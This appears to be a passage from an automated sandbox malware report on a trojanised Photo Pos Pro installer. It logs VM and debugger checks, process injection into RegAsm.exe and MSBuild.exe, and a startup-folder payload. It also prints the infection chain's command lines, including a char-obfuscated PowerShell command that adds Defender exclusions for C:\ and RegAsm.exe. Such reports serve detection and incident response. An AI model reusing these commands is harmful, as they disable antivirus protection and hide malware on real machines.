                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 381000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59754
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59629
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 413000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59428
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 504000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59837
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59575
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59467
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 390000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59889
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59784
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\Local\Temp\inst5429125\installerJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\Local\Temp\inst5429125Jump to behavior
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: S-1-0Null AuthorityS-1-0-0NobodyS-1-1World AuthorityS-1-2Local AuthorityS-1-2-0LocalS-1-2-1Console LogonS-1-3Creator AuthorityS-1-3-0Creator OwnerS-1-3-1Creator GroupS-1-3-2Creator Owner ServerS-1-3-3Creator Group ServerS-1-5-80-0All ServicesS-1-4Non-unique AuthorityS-1-5NT AuthorityS-1-5-1DialupS-1-5-2NetworkS-1-5-3BatchS-1-5-4InteractiveS-1-5-6ServiceS-1-5-7AnonymousS-1-5-8ProxyS-1-5-9Enterprise Domain ControllersS-1-5-10Principal SelfS-1-5-11Authenticated UsersS-1-5-12Restricted CodeS-1-5-13Terminal Server UsersS-1-5-14Remote Interactive LogonS-1-5-15This OrganizationS-1-5-17Local SystemS-1-5-19S-1-5-20AdministratorsS-1-5-32-545UsersS-1-5-32-546GuestsS-1-5-32-547Power UsersS-1-5-32-548Account OperatorsS-1-5-32-549Server OperatorsS-1-5-32-550Print OperatorsS-1-5-32-551Backup OperatorsS-1-5-32-552ReplicatorsS-1-5-64-10NTLM AuthenticationS-1-5-64-14SChannel AuthenticationS-1-5-64-21Digest AuthenticationS-1-5-80NT ServiceS-1-5-83-0NT VIRTUAL MACHINE\Virtual MachinesS-1-16-0Untrusted Mandatory LevelS-1-16-4096Low Mandatory LevelS-1-16-8192Medium Mandatory LevelS-1-16-8448Medium Plus Mandatory LevelS-1-16-12288High Mandatory LevelS-1-16-16384System Mandatory LevelS-1-16-20480Protected Process Mandatory LevelS-1-16-28672Secure Process Mandatory LevelS-1-5-32-554BUILTIN\Pre-Windows 2000 Compatible AccessS-1-5-32-555BUILTIN\Remote Desktop UsersS-1-5-32-556BUILTIN\Network Configuration OperatorsS-1-5-32-557BUILTIN\Incoming Forest Trust BuildersS-1-5-32-558BUILTIN\Performance Monitor UsersS-1-5-32-559BUILTIN\Performance Log UsersS-1-5-32-560BUILTIN\Windows Authorization Access GroupS-1-5-32-561BUILTIN\Terminal Server License ServersS-1-5-32-562BUILTIN\Distributed COM UsersS-1-5-32-569BUILTIN\Cryptographic OperatorsS-1-5-32-573BUILTIN\Event Log ReadersS-1-5-32-574BUILTIN\Certificate Service DCOM AccessS-1-5-32-575BUILTIN\RDS Remote Access ServersS-1-5-32-576BUILTIN\RDS Endpoint ServersS-1-5-32-577BUILTIN\RDS Management ServersS-1-5-32-578BUILTIN\Hyper-V AdministratorsS-1-5-32-579BUILTIN\Access Control Assistance Operators
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3101212504.00000202CFA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: smcdll.exe, 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: MSID82B.tmp, 00000008.00000002.1845282427.000002224116C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22a
                  Source: smcdll.exe, 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: svchost.exe, 0000001A.00000002.2968269398.00000168FC42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2973257832.00000168FDA5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: smcdll.exe, 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: smcdll.exe, 00000028.00000002.2744565701.0000000005300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: wsIvqEMUeFm7hF1d03L
                  Source: RegAsm.exe, 0000001D.00000002.2965578941.0000000000B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                  Source: wscript.exe, 00000027.00000002.2568054195.00000208C15A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3083055354.00000202CE290000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2971313710.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00406D9D rdtsc 6_2_00406D9D
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003E6863 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E6863
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0030E370 GetLocalTime,CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_0030E370
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003181D0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_003181D0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003E0FFD mov esi, dword ptr fs:[00000030h]0_2_003E0FFD
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003E1069 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_003E1069
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\PhotoPosPro4_SetUp.exe "C:\Program Files (x86)\PhotoPosPro4_SetUp.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F4480 __set_se_translator,SetUnhandledExceptionFilter,0_2_001F4480
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003E6863 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E6863
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003E1AEE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003E1AEE
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B777C24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF71B777C24
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B778808 SetUnhandledExceptionFilter,8_2_00007FF71B778808
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B778620 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF71B778620
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B77D658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF71B77D658
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\svchost.exeDomain query: s0.2mdn.net
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'"
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 800000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 48A000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 48C000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 959008
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 76F0A6F0
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 412000
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 860008
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 48A000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 48C000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 700008
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 76F0A6F0
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 800000
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 802000
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 812000
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 814000
                  Source: C:\Users\user\AppData\Local\smcdll.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 610008
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B746FA0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongPtrW,8_2_00007FF71B746FA0
                  Source: C:\Windows\Installer\MSID82B.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "tar -xf 18.jpg -C $env:public" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Move-Item -Path '18.jpg' -Destination $env:public" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\18.vbs" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\tar.exe "C:\Windows\system32\tar.exe" -xf 18.jpg -C C:\Users\PublicJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe "C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" /install /quiet /norestart
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe "C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=AfterInstallThankYouPage&Param1=PhotoPosPro
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeProcess created: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe "C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=580 /install /quiet /norestart
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\smcdll.exe "C:\Users\user\AppData\Local\smcdll.exe"
                  Source: C:\Users\user\AppData\Local\smcdll.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo pos pro\photo pos pro 4.12.43\install\56332c6\setup.msi" ai_setupexepath=c:\users\user\desktop\photopospro4_setup.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1740326085 "
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionprocess 'regasm.exe'"
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo pos pro\photo pos pro 4.12.43\install\56332c6\setup.msi" ai_setupexepath=c:\users\user\desktop\photopospro4_setup.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1740326085 " Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionprocess 'regasm.exe'"
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_004216E6 GetVersion,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,6_2_004216E6
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0030F660 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,0_2_0030F660
                  Source: MSBuild.exe, 00000025.00000002.2982455411.0000000002982000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.0000000002974000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.00000000029B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q
                  Source: MSBuild.exe, 00000025.00000002.2982455411.0000000002982000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.0000000002974000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.3059720447.0000000005127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3091982432.00000202CE412000.00000002.00000001.01000000.00000021.sdmpBinary or memory string: Shell_TrayWnd;ExceptionStr_GetDC_UnexpectedUExceptionStr_CreateCompatibleDC_UnexpectedQExceptionStr_CreateDIBSection_Unexpected=ExceptionStr_BitBlt_Unexpected
                  Source: MSBuild.exe, 00000025.00000002.2982455411.0000000002982000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.0000000002974000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.00000000029B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,^q
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0040686D cpuid 6_2_0040686D
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,0_2_003426D0
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: GetLocaleInfoA,lstrcpyA,__aulldiv,__aulldiv,__aulldiv,6_2_00420C4F
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: GetLocaleInfoA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,SetDlgItemTextA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,SetDlgItemTextA,GetDlgItem,EnableWindow,6_2_0040DACF
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: LoadLibraryA,GetProcAddress,FreeLibrary,GetLocaleInfoA,lstrcpyA,FreeLibrary,6_2_004226A9
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00007FF71B797BA0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: EnumSystemLocalesW,8_2_00007FF71B797B08
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: EnumSystemLocalesW,8_2_00007FF71B797A38
